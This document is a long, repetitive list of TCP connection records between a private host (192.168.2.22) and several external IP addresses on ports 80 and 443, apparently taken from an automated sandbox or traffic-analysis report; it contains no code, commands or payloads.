                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 163.172.115.127:80 -> 192.168.2.22:49173
                      Source: global trafficTCP traffic: 192.168.2.22:49173 -> 163.172.115.127:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 47.92.133.65:80 -> 192.168.2.22:49179
                      Source: global trafficTCP traffic: 192.168.2.22:49179 -> 47.92.133.65:80
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49178 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49180 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49181 -> 218.38.121.17:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49174 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49175 -> 163.172.115.127:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
                      Source: global trafficTCP traffic: 192.168.2.22:49177 -> 163.172.108.69:443
